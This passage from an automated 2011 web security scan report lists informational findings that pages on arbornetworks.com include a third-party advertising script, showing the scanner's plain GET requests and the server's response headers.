<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.105. http://www.arbornetworks.com/en/what-we-do-network-security-solutions-services.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/what-we-do-network-security-solutions-services.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/what-we-do-network-security-solutions-services.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=ab7c6f014769b232b025d6743b146e21; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:30 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:30 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:31 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.106. http://www.arbornetworks.com/en/white-papers-global-network-security-topics-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/white-papers-global-network-security-topics-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/white-papers-global-network-security-topics-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=8cfe5f284b42828164be1b411a87779b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:04 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:04 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:05 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:50:06 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.107. http://www.arbornetworks.com/es/5.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /es/5.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /es/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d3de7b7312ba993afa82456e79e09788; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:26 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:26 GMT; path=/
Set-Cookie: mbfcookie[lang]=es; expires=Thu, 03-Feb-2011 23:55:27 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:55:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.108. http://www.arbornetworks.com/es/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /es/infrastructure-security-report.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /es/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=03fe76825e6a55a9875b9a268728ff32; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:24 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:24 GMT; path=/
Set-Cookie: mbfcookie[lang]=es; expires=Thu, 03-Feb-2011 23:55:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:55:47 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.109. http://www.arbornetworks.com/fr/4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /fr/4.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fr/4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=5cdec8e4d3efec138851ea039378ef98; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=fr; expires=Thu, 03-Feb-2011 23:55:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:55:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.110. http://www.arbornetworks.com/fr/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /fr/infrastructure-security-report.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fr/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=ce7f57000930b3ad5447edc90f42023e; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:26 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:26 GMT; path=/
Set-Cookie: mbfcookie[lang]=fr; expires=Thu, 03-Feb-2011 23:55:27 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:55:51 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.111. http://www.arbornetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?lang=en HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e393324131872a0a340d3674de17ba3d; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:24 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:24 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:25 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.112. http://www.arbornetworks.com/it  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /it

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /it HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:59:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=55e6ce65cdc308d83db1a56f181306d1; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:59:49 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:59:49 GMT; path=/
Set-Cookie: mbfcookie[lang]=it; expires=Thu, 03-Feb-2011 23:59:50 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:59:51 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.113. http://www.arbornetworks.com/it/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /it/infrastructure-security-report.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /it/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=7d71cb4f1d4a37470457699e23da18dd; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:46 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:46 GMT; path=/
Set-Cookie: mbfcookie[lang]=it; expires=Thu, 03-Feb-2011 23:55:47 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:55:56 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.114. http://www.arbornetworks.com/jp/2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /jp/2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /jp/2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6cef0659327c8c343c70f99e01f17fcf; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:35 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:35 GMT; path=/
Set-Cookie: mbfcookie[lang]=jp; expires=Thu, 03-Feb-2011 23:56:36 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:56:36 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.115. http://www.arbornetworks.com/jp/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /jp/infrastructure-security-report.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /jp/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=92b447a47f02ff137bc46d5e100d8322; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:09 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:09 GMT; path=/
Set-Cookie: mbfcookie[lang]=jp; expires=Thu, 03-Feb-2011 23:56:10 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:56:23 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.116. http://www.arbornetworks.com/kr/2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /kr/2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /kr/2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:58:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=f486ab92f2f6896cb2c71ab3a04f81a2; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:58:54 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:58:54 GMT; path=/
Set-Cookie: mbfcookie[lang]=kr; expires=Thu, 03-Feb-2011 23:58:55 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:58:57 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.117. http://www.arbornetworks.com/kr/network-infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /kr/network-infrastructure-security-report.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /kr/network-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=28474c020d295a5738e5dbd192d0ec6c; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:36 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:36 GMT; path=/
Set-Cookie: mbfcookie[lang]=kr; expires=Thu, 03-Feb-2011 23:56:37 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:57:08 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


